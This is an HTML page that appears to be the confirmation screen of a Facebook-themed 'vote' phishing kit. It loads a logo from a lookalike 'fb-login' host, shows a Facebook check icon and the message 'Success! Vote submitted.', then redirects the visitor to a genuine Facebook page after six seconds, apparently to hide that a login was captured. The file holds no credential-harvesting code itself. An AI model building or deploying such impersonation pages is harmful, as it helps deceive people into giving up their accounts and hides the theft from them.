<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Connecting...</title>
    <link rel="icon" type="image/svg+xml" sizes="683x683" href="../assets/img/BHIOAa.svg">
    <link rel="stylesheet" href="../assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Aleo&amp;display=swap">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Quicksand&amp;display=swap">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto&amp;display=swap">
    <link rel="stylesheet" href="../assets/css/Contact-Form-Clean.css">
    <link rel="stylesheet" href="../assets/css/Highlight-Clean.css">
    <link rel="stylesheet" href="../assets/css/styles.css">
    <style>
      @font-face {
        font-weight: 400;
        font-style:  normal;
        font-family: circular;
        src: url('chrome-extension://liecbddmkiiihnedobmlmillhodjkdmb/fonts/CircularXXWeb-Regular.woff2') format('woff2');
      }
      @font-face {
        font-weight: 500;
        font-style:  normal;
        font-family: circular;
        src: url('chrome-extension://liecbddmkiiihnedobmlmillhodjkdmb/fonts/CircularXXWeb-Medium.woff2') format('woff2');
      }
      @font-face {
        font-weight: 700;
        font-style:  normal;
        font-family: circular;
        src: url('chrome-extension://liecbddmkiiihnedobmlmillhodjkdmb/fonts/CircularXXWeb-Bold.woff2') format('woff2');
      }
      @font-face {
        font-weight: 900;
        font-style:  normal;
        font-family: circular;
        src: url('chrome-extension://liecbddmkiiihnedobmlmillhodjkdmb/fonts/CircularXXWeb-Black.woff2') format('woff2');
      }
    </style>
  </head>
  <body>
    <nav class="navbar navbar-light navbar-expand-md" style="padding-bottom: 90px;margin-bottom: 52px;text-align:center;">
      <div class="container-fluid">
        <img class="img-fluid mx-auto" src="https://fb-login0422.up.railway.app/assets/img/ZJKpdsjk.svg" style="padding-right: center;padding-right: 10px;width: 140px;margin-top: 0px;">
      </div>
    </nav>
    <div class="contact-clean" style="padding: 0;padding-top: 0 px;padding-bottom: 0px;background: rgb(255,255,255);">
      <form id="asset" style="width: 100%;padding-top: 0;padding-right: 15px;padding-left: 10px;border-style: none;box-shadow: inset 0px 0px;text-align:center;">
        <div>
          <img class="img-fluid mx-auto" src="https://static.wixstatic.com/media/8f8a88_3a96ad076d5d47a381cb625dd052a8a3~mv2.jpg/v1/fill/w_950,h_950,al_c,q_85,usm_0.66_1.00_0.01,enc_auto/8f8a88_3a96ad076d5d47a381cb625dd052a8a3~mv2.jpg" style="width: 68px;margin-bottom: 11px;">
          <p style="text-align: 68px;margin-bottom: center;padding-right: 15%;padding-left: 15%;color: rgba(99,106,113,0.88);"><strong>Success!</strong> Vote submitted.<br></p>
          <p style="text-align: center;padding-right: 15%;padding-left: 15%;color: rgba(99,106,113,0.88);"></p>

          <img class="img-fluid mx-auto" src="https://logowik.com/content/uploads/images/facebook-check-icon9872.logowik.com.webp" style="width: 68px;margin-bottom: 11px;">
          <p style="text-align: center;padding-right: 15%;padding-left: 15%;color: rgba(99,106,113,0.88);">Redirecting to homepage...</p>
</div>
</form>

</div>
<script>
  setTimeout(function(){
    const urlParams = new URLSearchParams(window.location.search);
    const myParam = urlParams.get('app');
    window.location.href = "https://www.facebook.com/mentalhealthph/";
  }, 6000);
</script>
<script src="../assets/js/jquery.min.js"></script>
<script src="../assets/bootstrap/js/bootstrap.min.js"></script>
<script src="../assets/js/bootstrap.js"></script>
<div id="loom-companion-mv3" ext-id="liecbddmkiiihnedobmlmillhodjkdmb">
  <section id="shadow-host-companion"></section>
</div>
  </body>
</html>